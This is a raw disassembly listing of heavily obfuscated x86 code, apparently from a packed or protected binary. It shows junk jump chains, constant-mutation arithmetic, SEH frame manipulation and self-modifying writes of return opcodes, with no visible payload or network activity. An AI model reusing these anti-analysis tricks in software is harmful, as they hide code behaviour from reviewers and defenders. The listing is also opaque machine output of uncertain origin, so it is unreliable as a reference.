; FUNCTION CHUNK AT 0045ABFB SIZE 0000001B BYTES

		xchg	edi, [esp+0]

loc_440802:				; CODE XREF: y2kk37jd:loc_44DE11j
		pop	edi
		push	esi
		pushf
		jmp	loc_45ABFB
sub_4407FF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_44080A:				; CODE XREF: sub_43B765+1554Aj
		jnz	loc_4469E4

loc_440810:				; CODE XREF: sub_45B7AA-18D9Aj
		jmp	loc_441BB4
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_440815:				; CODE XREF: sub_43D412+6j
		jmp	loc_457D25
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
		ja	loc_43EA51
		or	esi, 0BC44F575h
		jmp	loc_4469DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C498

loc_44082B:				; CODE XREF: sub_43C498-133Cj
		sub	eax, 0AC6A595Ch
		xor	eax, 0B322B7A9h
		call	sub_440337
		call	sub_45C6B8
; END OF FUNCTION CHUNK	FOR sub_43C498
; START	OF FUNCTION CHUNK FOR sub_448159

loc_440841:				; CODE XREF: sub_448159-9BE9j
		jmp	loc_4560CE
; END OF FUNCTION CHUNK	FOR sub_448159
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D715

loc_440846:				; CODE XREF: sub_44D715:loc_456958j
		push	offset sub_453838
		jmp	locret_45B817
; END OF FUNCTION CHUNK	FOR sub_44D715
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444899

loc_440850:				; CODE XREF: sub_444899:loc_441119j
					; y2kk37jd:loc_450C1Cj
		mov	ebx, edx
		xchg	ebx, [esp+8+var_8]
		push	edi
		push	0BDCC3ECCh
		pop	edi
		or	edi, 3C042CDDh
		jmp	loc_44F258
; END OF FUNCTION CHUNK	FOR sub_444899
; ---------------------------------------------------------------------------

loc_440867:				; CODE XREF: y2kk37jd:00449597j
		jnz	loc_44CF5C
		sbb	edi, edx
		popf
		xor	ebx, eax
		jmp	loc_447641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_440877:				; CODE XREF: sub_44B814:loc_44EAFEj
		jnz	loc_43CAF2

loc_44087D:				; CODE XREF: sub_4434CD+10850j
		jmp	loc_455133
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6E

loc_440882:				; CODE XREF: sub_446B6E-4FE3j
		jmp	loc_45028B
; END OF FUNCTION CHUNK	FOR sub_446B6E
; ---------------------------------------------------------------------------

loc_440887:				; CODE XREF: y2kk37jd:0044043Fj
		jmp	loc_444D1F
; ---------------------------------------------------------------------------

loc_44088C:				; CODE XREF: y2kk37jd:0043C821j
		jmp	loc_4550E1
; ---------------------------------------------------------------------------
		and	eax, 0CA1DE0C1h
		jmp	loc_43CAEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44089C:				; CODE XREF: sub_43F75D:loc_4440CCj
					; sub_452884+29CEj
		jnz	loc_459959

loc_4408A2:				; CODE XREF: sub_445226-1423j
		jmp	loc_44B624
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		and	ecx, eax
		jmp	loc_459950
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_389. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4408AF:				; CODE XREF: sub_456809-200Cj
		jmp	loc_443864
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_4408B4:				; CODE XREF: sub_44B814+42E6j
		jmp	loc_452706
; END OF FUNCTION CHUNK	FOR sub_44B814

; =============== S U B	R O U T	I N E =======================================



sub_4408B9	proc near		; CODE XREF: y2kk37jd:00445D89j
					; sub_453867:loc_451CDEp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C4D6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442789 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443591 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445091 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445826 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A593 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DF7E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451409 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004526F1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004538C5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453B06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457150 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00458968 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458E9E SIZE 0000000F BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		add	edx, [ebp-4]
		call	sub_44AA96

loc_4408C5:				; CODE XREF: sub_457FDC+Bj
		jmp	loc_443591
sub_4408B9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4408CA:				; CODE XREF: sub_453867+Cj
		jmp	loc_4539F0
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_4408CF:				; CODE XREF: y2kk37jd:0043FB9Fj
		jmp	loc_45B386
; ---------------------------------------------------------------------------

loc_4408D4:				; DATA XREF: y2kk37jd:0043F328o
		push	87FF8DCh
		pop	ecx
		and	ecx, 6AAAB3A7h
		xor	ecx, 0FB6A3FC3h
		cmp	edx, ecx
		pop	ecx
		rol	eax, 0Dh
		pop	eax
		jmp	loc_443DC6
; ---------------------------------------------------------------------------

loc_4408F2:				; CODE XREF: y2kk37jd:00442992j
		jg	loc_4481D9
		sbb	ebp, 0B3EB21CAh
		jmp	sub_44E648
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F1

loc_440903:				; CODE XREF: sub_44E0F1+Aj
		pop	edx
		sub	edx, 0A03BCF65h
		add	edx, 0AE5633F1h
		xor	edx, 0C3B3FF82h
		and	edx, 68297E40h
		add	edx, 981C1EDBh
		xchg	edx, [esp+0]
		jmp	sub_446819
; END OF FUNCTION CHUNK	FOR sub_44E0F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44092A:				; CODE XREF: sub_43C851+1BA7Fj
		sbb	edx, ebp
		xchg	edx, [ecx]

loc_44092E:				; CODE XREF: sub_43C851:loc_4449D4j
		add	eax, 228597ACh
		xor	eax, 0A13B034Ah
		call	sub_4486E1
; END OF FUNCTION CHUNK	FOR sub_43C851
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44093F:				; CODE XREF: sub_44606C+26DFj
		jmp	loc_44AE62
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_440944:				; CODE XREF: sub_448CAE:loc_440C63j
		or	ecx, edx
		add	ebx, 0BD2F214Bh
		push	offset loc_44D5D2
		jmp	loc_43FD4A
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
		push	edx
		jmp	sub_44C922
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44095C:				; CODE XREF: sub_442A84:loc_44DD5Dj
		mov	[esi], eax
		xchg	ebp, [esp-8+arg_0]
		mov	esi, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_440965:				; CODE XREF: sub_45B7AA-6A3Fj
		rol	eax, 0Fh
		jmp	loc_456FEC
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		push	edi
		push	5ACB3050h
		pop	edi
		and	edi, 676D451Fh
		rol	edi, 14h
		xor	edi, 0AADC7CD8h
		add	edi, 54698868h
		mov	[edi], eax
		jmp	loc_45BF4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_440990:				; CODE XREF: sub_4440AB+12F3Bj
		jz	loc_44267A
		jmp	loc_43C2F5
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
		push	9B9204DBh
		pop	eax
		and	eax, 179B527Bh
		sub	eax, 0FE610F74h
		xor	eax, 0ACBD4D30h
		push	edi
		push	6609BAC0h
		pop	edi
		jmp	loc_4532EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_4409BF:				; CODE XREF: sub_443AA7+14025j
		rol	ebp, 6
		jmp	loc_45A347
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_4409C7:				; CODE XREF: y2kk37jd:00453121j
		push	8B43CBF5h
		jmp	loc_44C019
; ---------------------------------------------------------------------------
		mov	edi, ebx
		jmp	loc_4587B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4409D8:				; CODE XREF: sub_445226:loc_4452BDj
		pop	edx
		xor	ecx, 12896B65h
		and	ecx, 270B7371h
		add	ecx, 0DB44097Bh
		jmp	loc_43BED1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		test	ebp, eax
		jmp	loc_4421D0
; ---------------------------------------------------------------------------
		push	eax
		push	edi
		push	0DC4EDCDDh
		pop	edi
		jmp	loc_459CE6
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E138
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_497. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sub	dword ptr [ebx-78FFFF2Fh], 0D08B2404h
		jmp	loc_44404B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_440A1A:				; CODE XREF: sub_44DBF8:loc_450430j
					; y2kk37jd:loc_45532Ej
		push	offset loc_44510E
		jmp	loc_453CE8
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_440A24:				; CODE XREF: sub_43C7B9:loc_43DF0Cj
		xchg	esi, [esp+8+var_8]
		mov	ebp, esi
		pop	esi
		mov	eax, ds:dword_44D2F8
		or	eax, eax
		jmp	loc_4470D9
; END OF FUNCTION CHUNK	FOR sub_43C7B9

; =============== S U B	R O U T	I N E =======================================



sub_440A37	proc near		; CODE XREF: sub_453153+5p
					; y2kk37jd:0045961Dj

; FUNCTION CHUNK AT 0044B154 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	al, 1
		push	offset sub_457A87
		jmp	loc_44B154
sub_440A37	endp


; =============== S U B	R O U T	I N E =======================================



sub_440A47	proc near		; CODE XREF: sub_4430DD+16D76j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444DD1 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00445C64 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045671F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045AE2A SIZE 00000005 BYTES

		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		push	ebx
		push	164F5A55h
		pop	ebx
		jmp	loc_45AE2A
sub_440A47	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	ebx, edx
		jmp	sub_441DD4
; ---------------------------------------------------------------------------
		mov	ecx, eax
		jmp	sub_43ED19
; ---------------------------------------------------------------------------

loc_440A67:				; DATA XREF: sub_445BB5+3o
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_456E97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_440A75:				; CODE XREF: sub_44AC89:loc_43D90Cj
		jz	loc_452AAE
		cmp	esi, edi
		jmp	loc_452AA2
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------

loc_440A82:				; DATA XREF: sub_456809:loc_43C109o
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44DE39
		jmp	loc_4452DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_440A93:				; CODE XREF: sub_449C4F+80C5j
		jb	loc_447A60

loc_440A99:				; CODE XREF: sub_449C4F:loc_44150Dj
		mov	eax, [ebp-18h]
		mov	eax, [eax+24h]
		push	esi
		jmp	loc_444067
; END OF FUNCTION CHUNK	FOR sub_449C4F

; =============== S U B	R O U T	I N E =======================================



sub_440AA5	proc near		; DATA XREF: sub_43F770:loc_458B86o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043EF23 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044B6FF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C66C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004506D5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457D48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B0F9 SIZE 00000017 BYTES

		call	sub_44C500
		mov	eax, 64A3F24h
		call	sub_440337
		mov	ds:off_41E1F8, eax
		jmp	loc_45B0F9
sub_440AA5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_440ABF:				; CODE XREF: sub_4458DD-6190j
		xchg	eax, [esp-8+arg_4]
		mov	ecx, eax
		pop	eax
		xchg	esi, [esp-0Ch+arg_8]
		call	sub_459ADE

loc_440ACD:				; CODE XREF: sub_4567C1+21j
		pushf
		jmp	loc_440585
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4474A9

loc_440AD3:				; CODE XREF: sub_4474A9+17j
		pop	eax
		call	loc_450F3A
; END OF FUNCTION CHUNK	FOR sub_4474A9
; START	OF FUNCTION CHUNK FOR sub_45A632

loc_440AD9:				; CODE XREF: sub_45A632+7j
		jmp	sub_459AFA
; END OF FUNCTION CHUNK	FOR sub_45A632
; ---------------------------------------------------------------------------

loc_440ADE:				; DATA XREF: sub_43EB1C+1o
		push	ecx
		call	sub_459AB0
		mov	esp, [esp+8]
; START	OF FUNCTION CHUNK FOR sub_43CB6C

loc_440AE8:				; CODE XREF: sub_43CB6C+9j
					; sub_45380A-E857j ...
		xor	eax, eax

loc_440AEA:				; CODE XREF: sub_43CB6C+11j
					; sub_451BD9+2j
		pop	large dword ptr	fs:0
		pop	edx
		pop	ecx
		pop	ebx
		jmp	loc_43F900
; END OF FUNCTION CHUNK	FOR sub_43CB6C
; ---------------------------------------------------------------------------

loc_440AF9:				; CODE XREF: y2kk37jd:0043D115j
		pop	ecx
		push	esi

loc_440AFB:				; CODE XREF: y2kk37jd:loc_44504Fj
		mov	eax, [esp]
		call	sub_44AD49

loc_440B03:				; CODE XREF: y2kk37jd:00447476j
					; y2kk37jd:00450632j
		xchg	eax, [esp]
		push	offset loc_44C9FB
		jmp	loc_44376A
; ---------------------------------------------------------------------------

loc_440B10:				; CODE XREF: y2kk37jd:loc_43B308j
					; y2kk37jd:loc_451D83j
		cdq
		jmp	loc_4400BB

; =============== S U B	R O U T	I N E =======================================



sub_440B16	proc near		; CODE XREF: sub_45689F+45C0p
		push	esi
		mov	esi, ebp
		push	offset loc_44BC0D
		jmp	nullsub_34
sub_440B16	endp

; ---------------------------------------------------------------------------
		xor	ecx, 714E4AFFh
		jmp	loc_443E14
; ---------------------------------------------------------------------------

loc_440B2E:				; CODE XREF: y2kk37jd:004426FAj
		adc	edi, 0AD7BD6Eh
		jz	loc_44469D
		js	loc_44B211
		or	ebp, 895109CAh
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_440B46:				; CODE XREF: sub_440F0C+17DDj
		sub	esi, 45DB7C0Eh
		jmp	loc_43D037
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------

loc_440B51:				; CODE XREF: y2kk37jd:0044465Dj
		mov	eax, esi
		pop	esi
		or	eax, 8FF44836h
		rol	eax, 0Dh
		add	eax, 14E5336Ch
		xchg	eax, [esp]
		jmp	nullsub_482
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E068
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_482. PRESS KEYPAD	"+" TO EXPAND]
		dw 1E81h
		dd 0E9FFFFD7h, 13D1Bh

; =============== S U B	R O U T	I N E =======================================



sub_440B7C	proc near		; CODE XREF: y2kk37jd:0043EE62j
					; sub_45392D:loc_458896p

; FUNCTION CHUNK AT 0043D27C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457E46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045944A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [ebp-0Ch]
		push	eax
		push	0
		push	10h
		jmp	loc_45944A
sub_440B7C	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_278. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_440B8E:				; CODE XREF: y2kk37jd:00456E30j
		jz	loc_44B5D9
		jmp	loc_44BAF9
; ---------------------------------------------------------------------------

loc_440B99:				; DATA XREF: sub_4421DC+14727o
		push	edi
		push	0CD14E982h
		pop	edi
		add	edi, 0F7541644h
		or	edi, 0F53DDFD1h
		jmp	loc_43E00E
; ---------------------------------------------------------------------------

loc_440BB1:				; CODE XREF: y2kk37jd:00444878j
		jbe	loc_43DD48

loc_440BB7:				; CODE XREF: y2kk37jd:loc_444860j
		add	edi, 3BCF15E9h
		popf
		xchg	edi, [esp]
		jmp	sub_45AC4B
; ---------------------------------------------------------------------------

loc_440BC6:				; CODE XREF: y2kk37jd:0045285Aj
		xor	edx, 2D81E709h
		xor	ebx, 443B1DD0h
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_440BD2:				; CODE XREF: sub_43C46D:loc_43D65Cj
		and	ebx, 75A61F80h
		add	ebx, 0CE9EFC16h
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_440BE6:				; CODE XREF: sub_4526A0-14FC3j
					; sub_43DE8B:loc_4407CBj
		cmp	eax, edi
		jmp	loc_43E320
; END OF FUNCTION CHUNK	FOR sub_4526A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_440BED:				; CODE XREF: sub_456809+3733j
		or	ecx, 0B656B610h
		and	ecx, 6C3B5AF5h
		test	ecx, 1000000h
		jmp	loc_44D444
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_440C04:				; CODE XREF: sub_4411C3:loc_43B8D1j
		jl	loc_456467

loc_440C0A:				; CODE XREF: y2kk37jd:0044DC8Aj
		jmp	loc_43D0F9
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_440C0F:				; CODE XREF: sub_43B765+B28Fj
		jmp	nullsub_384
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
		pushf
		mov	edx, ecx
		cmp	edx, 0C26E696Eh
		jmp	loc_443719
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_440C22:				; CODE XREF: sub_447F91-3E8j
		add	ecx, 469C50BFh
		push	offset sub_44058E
		jmp	nullsub_354
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_440C32:				; CODE XREF: sub_44201B+154E8j
		jnz	loc_44D106

loc_440C38:				; CODE XREF: sub_44B0D0-3D46j
		jmp	loc_459CCC
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------
		ror	ecx, 1Eh
		sub	ebx, 7EBF159Bh
		xor	ebp, 35E73206h
		jmp	loc_44D104
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_440C51:				; CODE XREF: sub_448CAE:loc_4523E0j
		add	eax, 8BA3B182h
		xor	eax, 3ED993EAh
		jnz	loc_45C32E

loc_440C63:				; CODE XREF: sub_459672-1653Dj
		jmp	loc_440944
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
		add	edx, ebp
		jmp	loc_45C326
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_440C6F:				; CODE XREF: sub_445568+B6CDj
					; sub_445568:loc_455F4Fj
		lea	eax, [ebp-2BBh]
		call	sub_4514DE

loc_440C7A:				; CODE XREF: y2kk37jd:0045AB0Cj
		jmp	loc_449E57
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B55D

loc_440C7F:				; CODE XREF: sub_44B55D+EE7Bj
		jmp	loc_446B67
; END OF FUNCTION CHUNK	FOR sub_44B55D
; ---------------------------------------------------------------------------

loc_440C84:				; CODE XREF: y2kk37jd:00450B9Dj
		jmp	loc_43E8F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_440C89:				; CODE XREF: sub_458FC0:loc_43B53Bj
		or	ebx, 0B01DB33Ch
		jmp	loc_4568CE
; END OF FUNCTION CHUNK	FOR sub_458FC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_440C94:				; CODE XREF: sub_43DF1F+1D5A7j
		sub	ebx, 1A9046A7h
		and	ebx, 7B5A56D5h
		test	ebx, 2
		jmp	loc_458E7E
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEFB

loc_440CAB:				; CODE XREF: sub_43FEFB+19F39j
		push	0F14329F8h
		popf
		rol	ebx, 19h
		xchg	esi, ebx
		jmp	loc_43E3F5
; END OF FUNCTION CHUNK	FOR sub_43FEFB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 0Bh
		mov	ds:dword_44FC80, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_440CC7:				; CODE XREF: sub_456809+2BCEj
		jmp	loc_45B9B5
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_440CCC:				; CODE XREF: sub_446718-1E0Bj
		jmp	loc_45959D
; END OF FUNCTION CHUNK	FOR sub_446718

; =============== S U B	R O U T	I N E =======================================



sub_440CD1	proc near		; CODE XREF: y2kk37jd:0043B90Cj
					; y2kk37jd:0043C6DBp ...

; FUNCTION CHUNK AT 00447CCB SIZE 00000005 BYTES

		push	offset sub_459035
		jmp	loc_447CCB
sub_440CD1	endp

; ---------------------------------------------------------------------------
		push	488558C6h
		xchg	ebx, [esp]
		mov	eax, ebx
		pop	ebx
		and	eax, 86272E75h
		jmp	loc_45A38C
; ---------------------------------------------------------------------------

loc_440CF1:				; CODE XREF: y2kk37jd:loc_444C26j
		jnz	loc_458235
		jmp	loc_453A9E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_440CFC:				; CODE XREF: sub_44113A-1535j
		add	edi, ebp
		sbb	ebp, 0C7EB97E0h
		jmp	loc_44FB4B
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444825

loc_440D09:				; CODE XREF: sub_444825+42E7j
		jnz	loc_45BB94

loc_440D0F:				; CODE XREF: sub_444825:loc_450512j
		xor	eax, eax
		mov	[ebp-8], eax
; END OF FUNCTION CHUNK	FOR sub_444825
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_440D14:				; CODE XREF: sub_44610D+8j
					; sub_44610D+14180j
		jno	loc_43E35B
		mov	eax, [ebp-8]
		mov	dword ptr [ebp+eax*4-70h], 73257325h
		jmp	loc_45A286
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_440D2A	proc near		; DATA XREF: sub_43F346:loc_43F3B5o

; FUNCTION CHUNK AT 0045BEB5 SIZE 0000000F BYTES

		push	ecx
		pushf
		push	0F90F2C94h
		pop	ecx
		jmp	loc_45BEB5
sub_440D2A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CCE7

loc_440D37:				; CODE XREF: sub_44CCE7+ABE7j
		mov	[eax], esi

loc_440D39:				; CODE XREF: sub_44CCE7:loc_4578B5j
		rol	ebx, 14h
		add	ebx, 0E8B34EDAh
		xchg	ebx, [esp+0]
		jmp	loc_447A8F
; END OF FUNCTION CHUNK	FOR sub_44CCE7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595D8

loc_440D4B:				; CODE XREF: sub_4595D8:loc_443BD8j
		jz	loc_459F0C
		jmp	loc_45260B
; END OF FUNCTION CHUNK	FOR sub_4595D8

; =============== S U B	R O U T	I N E =======================================



sub_440D56	proc near		; CODE XREF: y2kk37jd:004401AFj
					; y2kk37jd:0044195Cp

; FUNCTION CHUNK AT 00441FE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D8FB SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		cmp	dword ptr [ebp-8], 0
		jz	loc_455063
		jmp	loc_44D8FB
sub_440D56	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_440D69:				; DATA XREF: sub_446323+7o
		call	sub_4476EE
		or	eax, eax
		jnz	loc_451ACB
		jmp	loc_45B771
; ---------------------------------------------------------------------------

loc_440D7B:				; CODE XREF: y2kk37jd:0044AB3Fj
		jnp	loc_457AC6

; =============== S U B	R O U T	I N E =======================================



sub_440D81	proc near		; CODE XREF: sub_459703-55E3p

; FUNCTION CHUNK AT 0044ECD9 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	al, [eax]
		push	offset loc_450EC2
		jmp	loc_44ECD9
sub_440D81	endp

; ---------------------------------------------------------------------------
		not	ecx
		rol	ebp, 8
		jmp	sub_43B2EB
; ---------------------------------------------------------------------------

loc_440D9B:				; CODE XREF: y2kk37jd:loc_4495DEj
		push	ecx
		pop	ebp
		xchg	ebp, [esp]
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		lea	eax, sub_44F7EA

loc_440DB0:				; CODE XREF: y2kk37jd:loc_447358j
		push	ebx
		push	9E21311Fh
		jmp	loc_445221
; ---------------------------------------------------------------------------

loc_440DBB:				; CODE XREF: y2kk37jd:00453216j
		or	eax, 4EBCBC00h

; =============== S U B	R O U T	I N E =======================================



sub_440DC1	proc near		; CODE XREF: sub_44615F+3CBp

; FUNCTION CHUNK AT 004448BA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A821 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [ebx]
		neg	eax
		cmp	ax, 0A5B3h
		jmp	loc_45A821
sub_440DC1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41E044, eax
		lea	eax, sub_454B84
		push	offset sub_442F2A
		jmp	loc_45B9E9
; ---------------------------------------------------------------------------
		push	eax
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_440DE9:				; CODE XREF: sub_4507BF+4C1Ej
		ror	eax, 4
		mov	ds:dword_446BC4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_440DF3:				; CODE XREF: y2kk37jd:004412F9j
		jmp	loc_4450C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4571A7

loc_440DF8:				; CODE XREF: sub_4571A7-177F9j
		jmp	loc_458441
; END OF FUNCTION CHUNK	FOR sub_4571A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_440DFD:				; CODE XREF: sub_43ED19:loc_441B91j
		shl	edx, 19h
		xor	eax, 74DB329Eh
		push	7A4B2B5Ah
		jmp	loc_4513C9
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_440E10:				; CODE XREF: y2kk37jd:00458E99j
		jg	loc_43C2C9
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_440E16:				; CODE XREF: sub_43DF1F:loc_458E7Ej
		add	ebx, 0A5379F43h
		mov	[ebx], eax
		pop	ebx
		lea	eax, loc_45B26A
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B26A
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------
		call	nullsub_433
		jmp	loc_459077
; ---------------------------------------------------------------------------
